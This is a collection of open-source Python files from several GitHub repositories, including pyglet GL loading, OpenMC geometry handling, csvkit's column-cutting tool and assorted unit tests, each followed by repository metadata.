if report["id"] == report_id:
report_found = True
self.assertTrue(report_found)
|
{
"content_hash": "5934905a72a0c14030dae4bf4624d357",
"timestamp": "",
"source": "github",
"line_count": 122,
"max_line_length": 100,
"avg_line_length": 34.68032786885246,
"alnum_prop": 0.6060033089104231,
"repo_name": "smcl/pyonfido",
"id": "02cda60d18f327a34747b4aa1960d304fb6984de",
"size": "4231",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "onfido/test/test_integration.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "20961"
}
],
"symlink_target": ""
}
|
'''
'''
from __future__ import print_function
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import ctypes
import pyglet
__all__ = ['link_GL', 'link_GLU', 'link_AGL', 'link_GLX', 'link_WGL']
_debug_gl = pyglet.options['debug_gl']
_debug_gl_trace = pyglet.options['debug_gl_trace']
_debug_gl_trace_args = pyglet.options['debug_gl_trace_args']
class MissingFunctionException(Exception):
def __init__(self, name, requires=None, suggestions=None):
msg = '%s is not exported by the available OpenGL driver.' % name
if requires:
msg += ' %s is required for this functionality.' % requires
if suggestions:
msg += ' Consider alternative(s) %s.' % ', '.join(suggestions)
Exception.__init__(self, msg)
def missing_function(name, requires=None, suggestions=None):
def MissingFunction(*args, **kwargs):
raise MissingFunctionException(name, requires, suggestions)
return MissingFunction
_int_types = (ctypes.c_int16, ctypes.c_int32)
if hasattr(ctypes, 'c_int64'):
# Some builds of ctypes apparently do not have c_int64
# defined; it's a pretty good bet that these builds do not
# have 64-bit pointers.
_int_types += (ctypes.c_int64,)
for t in _int_types:
if ctypes.sizeof(t) == ctypes.sizeof(ctypes.c_size_t):
c_ptrdiff_t = t
class c_void(ctypes.Structure):
# c_void_p is a buggy return type, converting to int, so
# POINTER(None) == c_void_p is actually written as
# POINTER(c_void), so it can be treated as a real pointer.
_fields_ = [('dummy', ctypes.c_int)]
class GLException(Exception):
pass
def errcheck(result, func, arguments):
if _debug_gl_trace:
try:
name = func.__name__
except AttributeError:
name = repr(func)
if _debug_gl_trace_args:
trace_args = ', '.join([repr(arg)[:20] for arg in arguments])
print('%s(%s)' % (name, trace_args))
else:
print(name)
from pyglet import gl
context = gl.current_context
if not context:
raise GLException('No GL context; create a Window first')
if not context._gl_begin:
error = gl.glGetError()
if error:
msg = ctypes.cast(gl.gluErrorString(error), ctypes.c_char_p).value
raise GLException(msg)
return result
def errcheck_glbegin(result, func, arguments):
from pyglet import gl
context = gl.current_context
if not context:
raise GLException('No GL context; create a Window first')
context._gl_begin = True
return result
def errcheck_glend(result, func, arguments):
from pyglet import gl
context = gl.current_context
if not context:
raise GLException('No GL context; create a Window first')
context._gl_begin = False
return errcheck(result, func, arguments)
def decorate_function(func, name):
if _debug_gl:
if name == 'glBegin':
func.errcheck = errcheck_glbegin
elif name == 'glEnd':
func.errcheck = errcheck_glend
elif name not in ('glGetError', 'gluErrorString') and \
name[:3] not in ('glX', 'agl', 'wgl'):
func.errcheck = errcheck
link_AGL = None
link_GLX = None
link_WGL = None
if pyglet.compat_platform in ('win32', 'cygwin'):
from pyglet.gl.lib_wgl import link_GL, link_GLU, link_WGL
elif pyglet.compat_platform == 'darwin':
from pyglet.gl.lib_agl import link_GL, link_GLU, link_AGL
else:
from pyglet.gl.lib_glx import link_GL, link_GLU, link_GLX
|
{
"content_hash": "e68cb6a5a6fbda01b0ab89c014b89b84",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 78,
"avg_line_length": 32.28181818181818,
"alnum_prop": 0.6333427203604618,
"repo_name": "nicememory/pie",
"id": "8e56210fb421060d79969b93e518133e7a9ab91b",
"size": "5270",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "pyglet/pyglet/gl/lib.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "5318"
},
{
"name": "C",
"bytes": "6624"
},
{
"name": "CSS",
"bytes": "1828"
},
{
"name": "HTML",
"bytes": "9229"
},
{
"name": "JavaScript",
"bytes": "6751"
},
{
"name": "Makefile",
"bytes": "5773"
},
{
"name": "PHP",
"bytes": "2190"
},
{
"name": "Python",
"bytes": "9377528"
},
{
"name": "Shell",
"bytes": "664"
},
{
"name": "Vim script",
"bytes": "2952"
}
],
"symlink_target": ""
}
|
import importlib
import os
from pathlib import Path
import pytest
from ...utils import needs_py310
@needs_py310
def test_testing_dbs_py39(tmp_path_factory: pytest.TempPathFactory):
tmp_path = tmp_path_factory.mktemp("data")
cwd = os.getcwd()
os.chdir(tmp_path)
test_db = Path("./test.db")
if test_db.is_file(): # pragma: nocover
test_db.unlink()
# Import while creating the client to create the DB after starting the test session
from docs_src.sql_databases.sql_app_py310.tests import test_sql_app
# Ensure import side effects are re-executed
importlib.reload(test_sql_app)
test_sql_app.test_create_user()
if test_db.is_file(): # pragma: nocover
test_db.unlink()
os.chdir(cwd)
|
{
"content_hash": "0c2abf21006439eca5e30826051ca39b",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 87,
"avg_line_length": 28.76923076923077,
"alnum_prop": 0.6885026737967914,
"repo_name": "tiangolo/fastapi",
"id": "9e6b3f3e2ccb007eacaa28fb99124252259f180c",
"size": "748",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_tutorial/test_sql_databases/test_testing_databases_py310.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "25"
},
{
"name": "HTML",
"bytes": "187"
},
{
"name": "Python",
"bytes": "1928986"
},
{
"name": "Shell",
"bytes": "1383"
}
],
"symlink_target": ""
}
|
from datetime import datetime, timedelta
from nose.tools import eq_
from mock import Mock, patch
import amo
import amo.tests
from addons.models import Addon
from users.models import UserProfile
from devhub.models import ActivityLog
from mkt.developers.models import (AddonPaymentAccount, CantCancel,
PaymentAccount, SolitudeSeller)
from mkt.developers.providers import get_provider
from mkt.site.fixtures import fixture
from test_providers import Patcher
class TestActivityLogCount(amo.tests.TestCase):
fixtures = ['base/addon_3615']
def setUp(self):
now = datetime.now()
bom = datetime(now.year, now.month, 1)
self.lm = bom - timedelta(days=1)
self.user = UserProfile.objects.filter()[0]
amo.set_user(self.user)
def test_not_review_count(self):
amo.log(amo.LOG['EDIT_VERSION'], Addon.objects.get())
eq_(len(ActivityLog.objects.monthly_reviews()), 0)
def test_review_count(self):
amo.log(amo.LOG['APPROVE_VERSION'], Addon.objects.get())
result = ActivityLog.objects.monthly_reviews()
eq_(len(result), 1)
eq_(result[0]['approval_count'], 1)
eq_(result[0]['user'], self.user.pk)
def test_review_count_few(self):
for x in range(0, 5):
amo.log(amo.LOG['APPROVE_VERSION'], Addon.objects.get())
result = ActivityLog.objects.monthly_reviews()
eq_(len(result), 1)
eq_(result[0]['approval_count'], 5)
def test_review_last_month(self):
log = amo.log(amo.LOG['APPROVE_VERSION'], Addon.objects.get())
log.update(created=self.lm)
eq_(len(ActivityLog.objects.monthly_reviews()), 0)
def test_not_total(self):
amo.log(amo.LOG['EDIT_VERSION'], Addon.objects.get())
eq_(len(ActivityLog.objects.total_reviews()), 0)
def test_total_few(self):
for x in range(0, 5):
amo.log(amo.LOG['APPROVE_VERSION'], Addon.objects.get())
result = ActivityLog.objects.total_reviews()
eq_(len(result), 1)
eq_(result[0]['approval_count'], 5)
def test_total_last_month(self):
log = amo.log(amo.LOG['APPROVE_VERSION'], Addon.objects.get())
log.update(created=self.lm)
result = ActivityLog.objects.total_reviews()
eq_(len(result), 1)
eq_(result[0]['approval_count'], 1)
eq_(result[0]['user'], self.user.pk)
def test_log_admin(self):
amo.log(amo.LOG['OBJECT_EDITED'], Addon.objects.get())
eq_(len(ActivityLog.objects.admin_events()), 1)
eq_(len(ActivityLog.objects.for_developer()), 0)
def test_log_not_admin(self):
amo.log(amo.LOG['EDIT_VERSION'], Addon.objects.get())
eq_(len(ActivityLog.objects.admin_events()), 0)
eq_(len(ActivityLog.objects.for_developer()), 1)
class TestPaymentAccount(Patcher, amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'user_999')
def setUp(self):
self.user = UserProfile.objects.filter()[0]
solsel_patcher = patch('mkt.developers.models.SolitudeSeller.create')
self.solsel = solsel_patcher.start()
self.solsel.return_value = self.seller = (
SolitudeSeller.objects.create(
resource_uri='selleruri', user=self.user))
self.solsel.patcher = solsel_patcher
super(TestPaymentAccount, self).setUp()
def tearDown(self):
self.solsel.patcher.stop()
super(TestPaymentAccount, self).tearDown()
def test_create_bango(self):
# Return a seller object without hitting Bango.
self.bango_patcher.package.post.return_value = {
'resource_uri': 'zipzap',
'package_id': 123,
}
res = get_provider().account_create(
self.user, {'account_name': 'Test Account'})
eq_(res.name, 'Test Account')
eq_(res.user, self.user)
eq_(res.seller_uri, 'selleruri')
eq_(res.account_id, 123)
eq_(res.uri, 'zipzap')
self.bango_patcher.package.post.assert_called_with(
data={'paypalEmailAddress': 'nobody@example.com',
'seller': 'selleruri'})
self.bango_patcher.bank.post.assert_called_with(
data={'seller_bango': 'zipzap'})
def test_cancel(self):
res = PaymentAccount.objects.create(
name='asdf', user=self.user, uri='foo',
solitude_seller=self.seller)
addon = Addon.objects.get()
AddonPaymentAccount.objects.create(
addon=addon, account_uri='foo',
payment_account=res, product_uri='bpruri')
res.cancel()
assert res.inactive
assert not AddonPaymentAccount.objects.exists()
def test_cancel_shared(self):
res = PaymentAccount.objects.create(
name='asdf', user=self.user, uri='foo',
solitude_seller=self.seller, shared=True)
addon = Addon.objects.get()
AddonPaymentAccount.objects.create(
addon=addon, account_uri='foo',
payment_account=res, product_uri='bpruri')
with self.assertRaises(CantCancel):
res.cancel()
def test_get_details(self):
package = Mock()
package.get.return_value = {'full': {'vendorName': 'a',
'some_other_value': 'b'}}
self.bango_patcher.package.return_value = package
res = PaymentAccount.objects.create(
name='asdf', user=self.user, uri='/foo/bar/123',
solitude_seller=self.seller)
deets = res.get_provider().account_retrieve(res)
eq_(deets['account_name'], res.name)
eq_(deets['vendorName'], 'a')
assert 'some_other_value' not in deets
self.bango_patcher.package.assert_called_with('123')
package.get.assert_called_with(data={'full': True})
def test_update_account_details(self):
res = PaymentAccount.objects.create(
name='asdf', user=self.user, uri='foo',
solitude_seller=self.seller)
res.get_provider().account_update(res, {
'account_name': 'new name',
'vendorName': 'new vendor name',
'something_other_value': 'not a package key'
})
eq_(res.name, 'new name')
self.bango_patcher.api.by_url(res.uri).patch.assert_called_with(
data={'vendorName': 'new vendor name'})
|
{
"content_hash": "223aaa7322876d2f9f57f3b13602c8c1",
"timestamp": "",
"source": "github",
"line_count": 180,
"max_line_length": 77,
"avg_line_length": 35.65,
"alnum_prop": 0.6083839800529842,
"repo_name": "wagnerand/zamboni",
"id": "503566f776df3e78911374cc8ca96df3aa2ec6b1",
"size": "6417",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "mkt/developers/tests/test_models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4145"
},
{
"name": "CSS",
"bytes": "884290"
},
{
"name": "JavaScript",
"bytes": "1677558"
},
{
"name": "Puppet",
"bytes": "13808"
},
{
"name": "Python",
"bytes": "6284101"
},
{
"name": "Shell",
"bytes": "19774"
}
],
"symlink_target": ""
}
|
import spotipy.core.baseplaylist
import spotify
class SpotifyPlayList(spotipy.core.baseplaylist.BasePlayList):
def __init__(self, wrapper, pl, name = None):
spotipy.core.baseplaylist.BasePlayList.__init__(self, wrapper)
self.__spotify_playlist = pl
self.__name = name
self.__listed = None
def get_name(self):
if self.__name != None:
return self.__name
else:
return self.__spotify_playlist.name()
def get_tracks(self):
if self.__listed == None:
self.__listed = []
if self.__spotify_playlist != None:
if self.__spotify_playlist.type() == "playlist":
for i, t in enumerate(self.__spotify_playlist):
af = self.get_wrapper().create_audio_file(t)
af.set_tracknumber(i + 1)
af.set_index(af.get_tracknumber())
self.__listed.append(af)
#yield af
else:
for x in self.get_child_lists():
#for t in x.get_tracks():
# yield t
self.__listed.extend(x.get_tracks())
return self.__listed
|
{
"content_hash": "fcada63140b824870c267d26340e1f8c",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 70,
"avg_line_length": 38.27272727272727,
"alnum_prop": 0.49406175771971494,
"repo_name": "ZenHarbinger/spotipy",
"id": "dad481be01cc142fbed2a59dbab63540b373f70f",
"size": "1288",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spotipy/backends/spotify/spotifyplaylist.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2140"
},
{
"name": "JavaScript",
"bytes": "3735"
},
{
"name": "Python",
"bytes": "142376"
}
],
"symlink_target": ""
}
|
from transmute_core.function.signature import Argument, NoDefault
from transmute_core.http_parameters import get_swagger_parameters
from transmute_core import default_context
from transmute_core.http_parameters import Parameters, Param, ParamSet
def test_swagger_parameters():
parameters = Parameters(
query=ParamSet(
{
"query": Param(
argument_name="query", arginfo=Argument("query", None, int)
)
}
),
body=ParamSet(
{
"left": Param(
argument_name="left", arginfo=Argument("left", NoDefault, int)
),
"right": Param(
argument_name="right", arginfo=Argument("right", 2, int)
),
}
),
header=ParamSet(
{
"header": Param(
argument_name="header", arginfo=Argument("header", NoDefault, int)
)
}
),
path=ParamSet(
{
"path": Param(
argument_name="path", arginfo=Argument("path", NoDefault, int)
)
}
),
)
params = get_swagger_parameters(parameters, default_context)
params = [p.to_primitive() for p in params]
assert {
"in": "query",
"name": "query",
"required": False,
"type": "integer",
"collectionFormat": "multi",
"description": "",
} in params
assert {
"in": "body",
"name": "body",
"schema": {
"type": "object",
"required": ["left"],
"properties": {
"left": {"type": "integer", "description": ""},
"right": {"type": "integer", "description": ""},
},
},
"required": True,
"description": "",
} in params
assert {
"in": "header",
"name": "header",
"type": "integer",
"required": True,
"description": "",
} in params
assert {
"in": "path",
"name": "path",
"type": "integer",
"required": True,
"description": "",
} in params
|
{
"content_hash": "a204355fa90c48fcc7047e638840dbb6",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 86,
"avg_line_length": 28.756410256410255,
"alnum_prop": 0.4551939366919304,
"repo_name": "toumorokoshi/web-transmute",
"id": "5cdd81378e76f8b57b9da29dc5f96ba5f555423a",
"size": "2243",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "transmute_core/tests/swagger/test_function.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "21259"
}
],
"symlink_target": ""
}
|
from collections import OrderedDict, defaultdict
from collections.abc import Iterable
from copy import deepcopy
from pathlib import Path
from xml.etree import ElementTree as ET
import openmc
import openmc._xml as xml
from .checkvalue import check_type
class Geometry:
"""Geometry representing a collection of surfaces, cells, and universes.
Parameters
----------
root : openmc.UniverseBase or Iterable of openmc.Cell, optional
Root universe which contains all others, or an iterable of cells that
should be used to create a root universe.
Attributes
----------
root_universe : openmc.UniverseBase
Root universe which contains all others
bounding_box : 2-tuple of numpy.array
Lower-left and upper-right coordinates of an axis-aligned bounding box
of the universe.
"""
def __init__(self, root=None):
self._root_universe = None
self._offsets = {}
if root is not None:
if isinstance(root, openmc.UniverseBase):
self.root_universe = root
else:
univ = openmc.Universe()
for cell in root:
univ.add_cell(cell)
self._root_universe = univ
@property
def root_universe(self):
return self._root_universe
@property
def bounding_box(self):
return self.root_universe.bounding_box
@root_universe.setter
def root_universe(self, root_universe):
check_type('root universe', root_universe, openmc.UniverseBase)
self._root_universe = root_universe
def add_volume_information(self, volume_calc):
"""Add volume information from a stochastic volume calculation.
Parameters
----------
volume_calc : openmc.VolumeCalculation
Results from a stochastic volume calculation
"""
if volume_calc.domain_type == 'cell':
for cell in self.get_all_cells().values():
if cell.id in volume_calc.volumes:
cell.add_volume_information(volume_calc)
elif volume_calc.domain_type == 'material':
for material in self.get_all_materials().values():
if material.id in volume_calc.volumes:
material.add_volume_information(volume_calc)
elif volume_calc.domain_type == 'universe':
for universe in self.get_all_universes().values():
if universe.id in volume_calc.volumes:
universe.add_volume_information(volume_calc)
def export_to_xml(self, path='geometry.xml', remove_surfs=False):
"""Export geometry to an XML file.
Parameters
----------
path : str
Path to file to write. Defaults to 'geometry.xml'.
remove_surfs : bool
Whether or not to remove redundant surfaces from the geometry when
exporting
.. versionadded:: 0.12
"""
# Find and remove redundant surfaces from the geometry
if remove_surfs:
self.remove_redundant_surfaces()
# Create XML representation
root_element = ET.Element("geometry")
self.root_universe.create_xml_subelement(root_element, memo=set())
# Sort the elements in the file
root_element[:] = sorted(root_element, key=lambda x: (
x.tag, int(x.get('id'))))
# Clean the indentation in the file to be user-readable
xml.clean_indentation(root_element)
# Check if path is a directory
p = Path(path)
if p.is_dir():
p /= 'geometry.xml'
# Write the XML Tree to the geometry.xml file
xml.reorder_attributes(root_element) # TODO: Remove when support is Python 3.8+
tree = ET.ElementTree(root_element)
tree.write(str(p), xml_declaration=True, encoding='utf-8')
@classmethod
def from_xml(cls, path='geometry.xml', materials=None):
"""Generate geometry from XML file
Parameters
----------
path : str, optional
Path to geometry XML file
materials : openmc.Materials or None
Materials used to assign to cells. If None, an attempt is made to
generate it from the materials.xml file.
Returns
-------
openmc.Geometry
Geometry object
"""
# Helper function for keeping a cache of Universe instances
universes = {}
def get_universe(univ_id):
if univ_id not in universes:
univ = openmc.Universe(univ_id)
universes[univ_id] = univ
return universes[univ_id]
tree = ET.parse(path)
root = tree.getroot()
# Get surfaces
surfaces = {}
periodic = {}
for surface in root.findall('surface'):
s = openmc.Surface.from_xml_element(surface)
surfaces[s.id] = s
# Check for periodic surface
other_id = xml.get_text(surface, 'periodic_surface_id')
if other_id is not None:
periodic[s.id] = int(other_id)
# Apply periodic surfaces
for s1, s2 in periodic.items():
surfaces[s1].periodic_surface = surfaces[s2]
# Add any DAGMC universes
for elem in root.findall('dagmc_universe'):
dag_univ = openmc.DAGMCUniverse.from_xml_element(elem)
universes[dag_univ.id] = dag_univ
# Dictionary that maps each universe to a list of cells/lattices that
# contain it (needed to determine which universe is the root)
child_of = defaultdict(list)
for elem in root.findall('lattice'):
lat = openmc.RectLattice.from_xml_element(elem, get_universe)
universes[lat.id] = lat
if lat.outer is not None:
child_of[lat.outer].append(lat)
for u in lat.universes.ravel():
child_of[u].append(lat)
for elem in root.findall('hex_lattice'):
lat = openmc.HexLattice.from_xml_element(elem, get_universe)
universes[lat.id] = lat
if lat.outer is not None:
child_of[lat.outer].append(lat)
if lat.ndim == 2:
for ring in lat.universes:
for u in ring:
child_of[u].append(lat)
else:
for axial_slice in lat.universes:
for ring in axial_slice:
for u in ring:
child_of[u].append(lat)
# Create dictionary to easily look up materials
if materials is None:
filename = Path(path).parent / 'materials.xml'
materials = openmc.Materials.from_xml(str(filename))
mats = {str(m.id): m for m in materials}
mats['void'] = None
for elem in root.findall('cell'):
c = openmc.Cell.from_xml_element(elem, surfaces, mats, get_universe)
if c.fill_type in ('universe', 'lattice'):
child_of[c.fill].append(c)
# Determine which universe is the root by finding one which is not a
# child of any other object
for u in universes.values():
if not child_of[u]:
return cls(u)
else:
raise ValueError('Error determining root universe.')
def find(self, point):
"""Find cells/universes/lattices which contain a given point
Parameters
----------
point : 3-tuple of float
Cartesian coordinates of the point
Returns
-------
list
Sequence of universes, cells, and lattices which are traversed to
find the given point
"""
return self.root_universe.find(point)
def get_instances(self, paths):
"""Return the instance number(s) for a cell/material in a geometry path.
The instance numbers are used as indices into distributed
material/temperature arrays and tally distribcell filter arrays.
Parameters
----------
paths : str or iterable of str
The path traversed through the CSG tree to reach a cell or material
instance. For example, 'u0->c10->l20(2,2,1)->u5->c5' would indicate
the cell instance whose first level is universe 0 and cell 10,
second level is lattice 20 position (2,2,1), and third level is
universe 5 and cell 5.
Returns
-------
int or list of int
Instance number(s) for the given path(s)
"""
# Make sure we are working with an iterable
return_list = (isinstance(paths, Iterable) and
not isinstance(paths, str))
path_list = paths if return_list else [paths]
indices = []
for p in path_list:
# Extract the cell id from the path
last_index = p.rfind('>')
last_path = p[last_index+1:]
uid = int(last_path[1:])
# Get corresponding cell/material
if last_path[0] == 'c':
obj = self.get_all_cells()[uid]
elif last_path[0] == 'm':
obj = self.get_all_materials()[uid]
# Determine index in paths array
try:
indices.append(obj.paths.index(p))
except ValueError:
indices.append(None)
return indices if return_list else indices[0]
def get_all_cells(self):
"""Return all cells in the geometry.
Returns
-------
collections.OrderedDict
Dictionary mapping cell IDs to :class:`openmc.Cell` instances
"""
if self.root_universe is not None:
return self.root_universe.get_all_cells(memo=set())
else:
return OrderedDict()
def get_all_universes(self):
"""Return all universes in the geometry.
Returns
-------
collections.OrderedDict
Dictionary mapping universe IDs to :class:`openmc.Universe`
instances
"""
universes = OrderedDict()
universes[self.root_universe.id] = self.root_universe
universes.update(self.root_universe.get_all_universes())
return universes
def get_all_materials(self):
"""Return all materials within the geometry.
Returns
-------
collections.OrderedDict
Dictionary mapping material IDs to :class:`openmc.Material`
instances
"""
if self.root_universe is not None:
return self.root_universe.get_all_materials(memo=set())
else:
return OrderedDict()
def get_all_material_cells(self):
"""Return all cells filled by a material
Returns
-------
collections.OrderedDict
Dictionary mapping cell IDs to :class:`openmc.Cell` instances that
are filled with materials or distributed materials.
"""
material_cells = OrderedDict()
for cell in self.get_all_cells().values():
if cell.fill_type in ('material', 'distribmat'):
if cell not in material_cells:
material_cells[cell.id] = cell
return material_cells
def get_all_material_universes(self):
"""Return all universes having at least one material-filled cell.
This method can be used to find universes that have at least one cell
that is filled with a material or is void.
Returns
-------
collections.OrderedDict
Dictionary mapping universe IDs to :class:`openmc.Universe`
instances with at least one material-filled cell
"""
material_universes = OrderedDict()
for universe in self.get_all_universes().values():
for cell in universe.cells.values():
if cell.fill_type in ('material', 'distribmat', 'void'):
if universe not in material_universes:
material_universes[universe.id] = universe
return material_universes
def get_all_lattices(self):
"""Return all lattices defined
Returns
-------
collections.OrderedDict
Dictionary mapping lattice IDs to :class:`openmc.Lattice` instances
"""
lattices = OrderedDict()
for cell in self.get_all_cells().values():
if cell.fill_type == 'lattice':
if cell.fill.id not in lattices:
lattices[cell.fill.id] = cell.fill
return lattices
def get_all_surfaces(self):
"""
Return all surfaces used in the geometry
Returns
-------
collections.OrderedDict
Dictionary mapping surface IDs to :class:`openmc.Surface` instances
"""
surfaces = OrderedDict()
for cell in self.get_all_cells().values():
if cell.region is not None:
surfaces = cell.region.get_surfaces(surfaces)
return surfaces
def get_redundant_surfaces(self):
"""Return all of the topologically redundant surface IDs
.. versionadded:: 0.12
Returns
-------
dict
Dictionary whose keys are the ID of a redundant surface and whose
values are the topologically equivalent :class:`openmc.Surface`
that should replace it.
"""
tally = defaultdict(list)
for surf in self.get_all_surfaces().values():
coeffs = tuple(surf._coefficients[k] for k in surf._coeff_keys)
key = (surf._type,) + coeffs
tally[key].append(surf)
return {replace.id: keep
for keep, *redundant in tally.values()
for replace in redundant}
def _get_domains_by_name(self, name, case_sensitive, matching, domain_type):
if not case_sensitive:
name = name.lower()
domains = []
func = getattr(self, f'get_all_{domain_type}s')
for domain in func().values():
domain_name = domain.name if case_sensitive else domain.name.lower()
if domain_name == name:
domains.append(domain)
elif not matching and name in domain_name:
domains.append(domain)
domains.sort(key=lambda x: x.id)
return domains
def get_materials_by_name(self, name, case_sensitive=False, matching=False):
"""Return a list of materials with matching names.
Parameters
----------
name : str
The name to match
case_sensitive : bool
Whether to distinguish upper and lower case letters in each
material's name (default is False)
matching : bool
Whether the names must match completely (default is False)
Returns
-------
list of openmc.Material
Materials matching the queried name
"""
return self._get_domains_by_name(name, case_sensitive, matching, 'material')
def get_cells_by_name(self, name, case_sensitive=False, matching=False):
"""Return a list of cells with matching names.
Parameters
----------
name : str
The name to search match
case_sensitive : bool
Whether to distinguish upper and lower case letters in each
cell's name (default is False)
matching : bool
Whether the names must match completely (default is False)
Returns
-------
list of openmc.Cell
Cells matching the queried name
"""
return self._get_domains_by_name(name, case_sensitive, matching, 'cell')
def get_cells_by_fill_name(self, name, case_sensitive=False, matching=False):
"""Return a list of cells with fills with matching names.
Parameters
----------
name : str
The name to match
case_sensitive : bool
Whether to distinguish upper and lower case letters in each
cell's name (default is False)
matching : bool
Whether the names must match completely (default is False)
Returns
-------
list of openmc.Cell
Cells with fills matching the queried name
"""
if not case_sensitive:
name = name.lower()
cells = set()
for cell in self.get_all_cells().values():
names = []
if cell.fill_type in ('material', 'universe', 'lattice'):
names.append(cell.fill.name)
elif cell.fill_type == 'distribmat':
for mat in cell.fill:
if mat is not None:
names.append(mat.name)
for fill_name in names:
if not case_sensitive:
fill_name = fill_name.lower()
if fill_name == name:
cells.add(cell)
elif not matching and name in fill_name:
cells.add(cell)
return sorted(cells, key=lambda x: x.id)
def get_universes_by_name(self, name, case_sensitive=False, matching=False):
"""Return a list of universes with matching names.
Parameters
----------
name : str
The name to match
case_sensitive : bool
Whether to distinguish upper and lower case letters in each
universe's name (default is False)
matching : bool
Whether the names must match completely (default is False)
Returns
-------
list of openmc.Universe
Universes matching the queried name
"""
return self._get_domains_by_name(name, case_sensitive, matching, 'universe')
def get_lattices_by_name(self, name, case_sensitive=False, matching=False):
"""Return a list of lattices with matching names.
Parameters
----------
name : str
The name to match
case_sensitive : bool
Whether to distinguish upper and lower case letters in each
lattice's name (default is False)
matching : bool
Whether the names must match completely (default is False)
Returns
-------
list of openmc.Lattice
Lattices matching the queried name
"""
return self._get_domains_by_name(name, case_sensitive, matching, 'lattice')
def remove_redundant_surfaces(self):
"""Remove redundant surfaces from the geometry"""
# Get redundant surfaces
redundant_surfaces = self.get_redundant_surfaces()
# Iterate through all cells contained in the geometry
for cell in self.get_all_cells().values():
# Recursively remove redundant surfaces from regions
if cell.region:
cell.region.remove_redundant_surfaces(redundant_surfaces)
def determine_paths(self, instances_only=False):
"""Determine paths through CSG tree for cells and materials.
This method recursively traverses the CSG tree to determine each unique
path that reaches every cell and material. The paths are stored in the
:attr:`Cell.paths` and :attr:`Material.paths` attributes.
Parameters
----------
instances_only : bool, optional
If true, this method will only determine the number of instances of
each cell and material.
"""
# (Re-)initialize all cell instances to 0
for cell in self.get_all_cells().values():
cell._paths = []
cell._num_instances = 0
for material in self.get_all_materials().values():
material._paths = []
material._num_instances = 0
# Recursively traverse the CSG tree to count all cell instances
self.root_universe._determine_paths(instances_only=instances_only)
def clone(self):
"""Create a copy of this geometry with new unique IDs for all of its
enclosed materials, surfaces, cells, universes and lattices."""
clone = deepcopy(self)
clone.root_universe = self.root_universe.clone()
return clone
|
{
"content_hash": "dc6b08c04dc43d0e6cd33d3f938c232f",
"timestamp": "",
"source": "github",
"line_count": 610,
"max_line_length": 88,
"avg_line_length": 33.368852459016395,
"alnum_prop": 0.5753868828297716,
"repo_name": "amandalund/openmc",
"id": "58a33c1b1217427ac7aa311e216787f77d9eab88",
"size": "20355",
"binary": false,
"copies": "4",
"ref": "refs/heads/develop",
"path": "openmc/geometry.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "8552"
},
{
"name": "C++",
"bytes": "1273951"
},
{
"name": "CMake",
"bytes": "27805"
},
{
"name": "Dockerfile",
"bytes": "1427"
},
{
"name": "Python",
"bytes": "2603788"
},
{
"name": "Shell",
"bytes": "2519"
}
],
"symlink_target": ""
}
|
"""
csvcut is originally the work of eminent hackers Joe Germuska and Aaron Bycoffe.
This code is forked from:
https://gist.github.com/561347/9846ebf8d0a69b06681da9255ffe3d3f59ec2c97
Used and modified with permission.
"""
import itertools
from csvkit import CSVKitReader, CSVKitWriter
from csvkit.cli import CSVKitUtility, parse_column_identifiers
from csvkit.headers import make_default_headers
from ColumnSelectorMixin import ColumnSelectorMixin
class CSVCut(CSVKitUtility,ColumnSelectorMixin):
description = 'Filter and truncate CSV files. Like unix "cut" command, but for tabular data.'
def add_arguments(self):
self.argparser.add_argument('-n', '--names', dest='names_only', action='store_true',
help='Display column names and indices from the input CSV and exit.')
self.argparser.add_argument('-c', '--columns', dest='columns',
help='A comma separated list of column indices or names to be extracted. Defaults to all columns.')
self.argparser.add_argument('-C', '--not-columns', dest='not_columns',
help='A comma separated list of column indices or names to be excluded. Defaults to no columns.')
self.argparser.add_argument('-x', '--delete-empty-rows', dest='delete_empty', action='store_true',
help='After cutting, delete rows which are completely empty.')
ColumnSelectorMixin.add_arguments(self)
def main(self):
if self.args.names_only:
self.print_column_names()
return
rows = CSVKitReader(self.input_file, **self.reader_kwargs)
if self.args.no_header_row:
row = next(rows)
column_names = make_default_headers(len(row))
# Put the row back on top
rows = itertools.chain([row], rows)
else:
column_names = next(rows)
column_ids = parse_column_identifiers(self.args.columns, column_names, self.args.zero_based, self.args.not_columns)
column_ids = self.parse_regex_column(self.args.regex_column,column_ids,column_names)
column_ids = self.parse_not_regex_column(self.args.not_regex_column,column_ids,column_names)
column_ids = self.parse_column_contains(self.args.column_contains,column_ids,column_names)
column_ids = self.parse_not_column_contains(self.args.not_column_contains,column_ids,column_names)
output = CSVKitWriter(self.output_file, **self.writer_kwargs)
output.writerow([column_names[c] for c in column_ids])
for row in rows:
out_row = [row[c] if c < len(row) else None for c in column_ids]
if self.args.delete_empty:
if ''.join(out_row) == '':
continue
output.writerow(out_row)
def launch_new_instance():
utility = CSVCut()
utility.main()
if __name__ == "__main__":
launch_new_instance()
|
{
"content_hash": "0d004a56945500a7b476da227c02a0b9",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 123,
"avg_line_length": 39.56164383561644,
"alnum_prop": 0.6648199445983379,
"repo_name": "unpingco/csvkit",
"id": "1795d8de7b56661bcee1bbe6de14ded7aefc715f",
"size": "2911",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "csvkit/utilities/csvcut.py",
"mode": "33261",
"license": "mit",
"language": [
{
